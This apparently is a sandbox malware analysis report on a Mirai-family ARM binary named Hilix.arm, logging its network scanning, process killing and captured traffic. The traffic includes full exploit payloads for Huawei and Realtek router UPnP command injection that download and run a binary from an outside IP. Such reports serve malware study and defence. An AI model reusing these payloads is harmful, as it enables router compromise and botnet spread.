61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.193.176.249:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.185.139.248:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.207.163.249:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.130.239.105:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.253.184.47:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.8.143.241:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.52.134.73:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.72.77.16:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.136.53.81:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.13.153.211:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.114.202.148:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.197.132.93:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.135.212.2:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.171.98.60:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.91.143.99:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.52.12.115:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.154.186.9:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.109.93.241:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.239.100.82:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.209.72.181:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.118.232.138:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.38.95.1:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.128.137.206:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.178.209.43:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.47.152.89:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.102.237.224:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.120.178.194:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.230.46.255:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.252.128.197:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.125.63.49:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.252.194.0:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.9.218.223:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.178.139.41:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.117.55.23:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.173.98.106:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.99.51.10:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.31.76.111:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.118.125.46:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.62.242.76:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.194.249.97:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.4.164.47:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.163.131.37:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.30.178.161:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.164.88.37:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.154.14.171:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.71.103.232:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.68.210.138:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.182.202.237:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.99.149.13:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.212.76.19:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.229.22.166:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.197.115.54:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.22.143.87:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.62.167.55:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.159.111.95:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.237.103.183:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.30.67.239:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.116.188.77:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.71.104.182:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.226.2.103:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.51.137.169:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.161.136.133:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.133.43.229:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.254.255.131:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.220.17.34:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.38.140.115:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.145.78.149:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.253.24.184:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.126.81.249:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.249.46.81:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.70.60.184:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.193.71.208:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.249.115.113:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.161.236.18:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.74.211.165:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.31.18.135:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.187.35.77:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.157.185.141:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.69.80.135:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.143.203.6:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.228.176.251:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.74.190.92:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.224.201.136:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.123.92.109:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.63.82.80:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.197.92.117:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.47.171.122:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.81.176.75:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.204.220.216:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.2.70.137:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.93.238.51:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.91.90.190:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.205.241.35:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 185.24.86.75:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 91.189.166.198:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.161.230.254:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.23.191.179:52869
Source: global traffic TCP traffic: 192.168.2.23:55795 -> 45.53.15.45:52869
Sample listens on a socket
Source: /tmp/Hilix.arm (PID: 5246) Socket: 0.0.0.0::0
Source: /tmp/Hilix.arm (PID: 5246) Socket: 0.0.0.0::53413
Source: /tmp/Hilix.arm (PID: 5246) Socket: 0.0.0.0::80
Source: /tmp/Hilix.arm (PID: 5246) Socket: 0.0.0.0::37215
Source: /tmp/Hilix.arm (PID: 5252) Socket: 0.0.0.0::0
Source: /tmp/Hilix.arm (PID: 5252) Socket: 0.0.0.0::53413
Source: /tmp/Hilix.arm (PID: 5252) Socket: 0.0.0.0::80
Source: /tmp/Hilix.arm (PID: 5252) Socket: 0.0.0.0::37215
Source: /usr/sbin/sshd (PID: 5290) Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5290) Socket: [::]::22
Source: /usr/sbin/sshd (PID: 5405) Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5405) Socket: [::]::22
Source: /usr/sbin/sshd (PID: 5409) Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5409) Socket: [::]::22
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknown HTTP traffic detected: POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

System Summary:

Sample tries to kill many processes (SIGKILL)
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5252, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 720, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 759, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 788, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 800, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 847, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 884, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 1334, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 1335, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 1872, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2096, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2097, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2102, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2180, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2191, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2208, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2275, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2281, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2285, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2289, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 2294, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5248, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5255, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5257, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5260, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5290, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5405, result: successful
Source: /tmp/Hilix.arm (PID: 5246) SIGKILL sent: pid: 5246, result: unknown
Source: /tmp/Hilix.arm (PID: 5252) SIGKILL sent: pid: 936, result: successful
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: classification engine Classification label: mal76.spre.troj.linARM@0/6@0/0
Source: Hilix.arm Joe Sandbox Cloud Basic: Detection: clean Score: 0

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Hilix.arm (PID: 5244) Queries kernel information via 'uname'
Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd-agent-1
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Hilix.armSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Hilix.arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp Binary or memory string: !/usr/bin/qemu-arm!/proc/5285/fd/11
Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP